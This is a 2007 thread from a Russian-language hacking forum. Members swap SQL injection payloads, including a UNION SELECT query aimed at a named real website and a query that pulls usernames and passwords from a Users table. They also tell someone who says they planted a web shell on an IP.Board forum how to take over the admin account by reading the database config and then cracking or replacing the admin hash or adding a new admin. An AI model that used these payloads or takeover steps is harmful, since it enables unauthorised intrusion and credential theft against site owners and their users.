ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

26.11.2007, 13:16
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
Сообщение от delay(0)
Я делал как дядя Cash прописал в своей статье.... Покажи тогда пример запроса.
Код:
asp?id=1+or+1=(SELECT+TOP+1+UserLogin%2bCHAR(58)%2bUserPassword+from+Users)--
ну как то так
__________________
Карфаген должен быть разрушен...
|
|
|

26.11.2007, 18:55
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме: 1813343
Репутация:
141
|
|
Сообщение от Scipio
Код:
asp?id=1+or+1=(SELECT+TOP+1+UserLogin%2bCHAR(58)%2bUserPassword+from+Users)--
ну как то так
Мимо, проверяй пм.
|
|
|

26.11.2007, 11:26
|
|
Участник форума
Регистрация: 06.03.2007
Сообщений: 283
Провел на форуме: 1547094
Репутация:
120
|
|
народ, я залил шел на IP.Board 2.2.2 © 2007 IPS, Inc. как теперь можно узнать пароль от админки??если можно и несложо обясните поподробние плиз
|
|
|

26.11.2007, 11:36
|
|
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме: 1628290
Репутация:
474
|
|
смотришь когфиг, там пасс, юзер и адрес от БД.
Заходишь в эту бд. Смотришь таблтцу с юзверями
Ищешь админа - брутишь хэш.
Меньше мороки - просто меняешь хэш
А лучше - вставить новую запись
|
|
|

26.11.2007, 11:40
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
ищи конфиг форума, там будет логин и пасс от СУБД, конектишься с этим пасом к базе и ищешь таблицу с юзерами
|
|
|

26.11.2007, 18:54
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме: 2706059
Репутация:
206
|
|
http://www.pp-pss.ru/main.php?ID=-1
помогите пожалуйста со скулем перебрал до 41 поля
http://www.pp-pss.ru/main.php?ID=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41/*
замучился может по другому как то надо
|
|
|

26.11.2007, 19:01
|
|
Участник форума
Регистрация: 05.07.2006
Сообщений: 285
Провел на форуме: 3295822
Репутация:
117
|
|
Сообщение от SVAROG
http://www.pp-pss.ru/main.php?ID=-1
помогите пожалуйста со скулем перебрал до 41 поля
http://www.pp-pss.ru/main.php?ID=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41/*
замучился может по другому как то надо
Он же не ругается да different column а тупо выводит твой запрос. Эдак до потери пульса можно подбирать =) Смотри что там фильтруется и меняй запрос.
|
|
|

27.11.2007, 13:46
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме: 8042357
Репутация:
3742
|
|
http://www.pp-pss.ru/main.php?ID=
1 колонка. без вывода. если мускул выше 4.0.* то возможен посимвольный перебор//
но тут 4.0.*. .поэтому он невозможен)
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|

27.11.2007, 16:23
|
|
Новичок
Регистрация: 23.10.2007
Сообщений: 28
Провел на форуме: 443802
Репутация:
19
|
|
Если в ссылке на Личное письмо в IPB 1.3 подставить в конце ' , то вместо
Обнаружена ошибка: Такого сообщения не существует
Напишет вот что :
.Просто пустой текст.Что это может быть?
Также если по той же самой ссылке поставить '; -- то выдаст пустой текст ошибки.
|
|
|

27.11.2007, 17:13
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме: 1668307
Репутация:
114
|
|
ИМХО: ничего!
инъекта там нет
|
|
|
|
 |
|
|
Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
|
|
|
|